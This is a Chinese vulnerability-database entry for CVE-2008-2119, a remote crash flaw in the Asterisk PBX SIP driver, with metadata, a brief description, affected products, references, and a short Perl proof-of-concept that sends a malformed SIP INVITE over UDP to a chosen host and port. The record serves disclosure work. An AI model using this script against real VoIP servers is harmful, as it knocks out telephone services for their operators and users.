Asterisk SIP通道驱动远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115359 漏洞类型 输入验证
发布时间 2008-06-05 更新时间 2008-06-05
CVE编号 CVE-2008-2119 CNNVD-ID CNNVD-200806-074
漏洞平台 Multiple CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/5749
https://www.securityfocus.com/bid/29516
https://cxsecurity.com/issue/WLB-2008060019
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-074
|漏洞详情
Asterisk是开放源码的软件PBX,支持各种VoIP协议和设备。Asterisk在以pedantic模式处理SIP时,Asterisk将From头的值传送给了ast_uri_decode函数进行解码。由于没有检查From值是否为空,因此上述情况可能导致例程崩溃。
|漏洞EXP
#!/usr/bin/perl -w
###############


# asterisk AST-2008-008
# by armando.j.m.o@gmail.com
#AST-2008-008 - Remote Crash Vulnerability in SIP channel driver when run in pedantic mode

use Getopt::Std;
use IO::Socket;
use strict;

my %args;
getopts("h:p:", \%args);

if (!$args{h} || !$args{p}) { usage(); }


my $sock = IO::Socket::INET->new(
    Proto    => 'udp',
    PeerPort => $args{p},
    PeerAddr => $args{h},
) or die "Could not create socket: $!\n";

$sock->send('INVITE sip:1234@'.$args{h}.' SIP/2.0\n
CSeq: 2 INVITE') or die "Send error: $!\n";




sub usage {
    print STDERR
qq{ $0

Usage: $0 -h <host> -p <port>
        -h <host>       = host
        -p <port>       = port

Example:
        $0 -h target -p port


};

# milw0rm.com [2008-06-05]
|受影响的产品
Gentoo Linux Asterisk Asterisk Business Edition B.2.5.2 Asterisk Asterisk Business Edition B.2.5.1 Asterisk Asterisk Business Edition B.2.3.6 Asterisk Asterisk Business Edition B.2.3.4
|参考资料

来源:SECTRACK
名称:1020166
链接:http://www.securitytracker.com/id?1020166
来源:BUGTRAQ
名称:20080603AST-2008-008:RemoteCrashVulnerabilityinSIPchanneldriverwhenruninpedanticmode
链接:http://www.securityfocus.com/archive/1/archive/1/493020/100/0/threaded
来源:svn.digium.com
链接:http://svn.digium.com/view/asterisk?view=rev&revision=120109
来源:GENTOO
名称:GLSA-200905-01
链接:http://security.gentoo.org/glsa/glsa-200905-01.xml
来源:SECUNIA
名称:34982
链接:http://secunia.com/advisories/34982
来源:downloads.digium.com
链接:http://downloads.digium.com/pub/security/AST-2008-008.html
来源:bugs.digium.com
链接:http://bugs.digium.com/view.php?id=12607
来源:XF
名称:asterisk-asturidecode-dos(42823)
链接:http://xforce.iss.net/xforce/xfdb/42823
来源:MILW0RM
名称:5749
链接:http://www.milw0rm.com/exploits/5749
来源:VUPEN
名称:ADV-2008-1731
链接:http://www.frsirt.com/english/advisories/2008/1731
来源:SECUNIA
名称:30517
链接:http://secunia.com/advisories/30517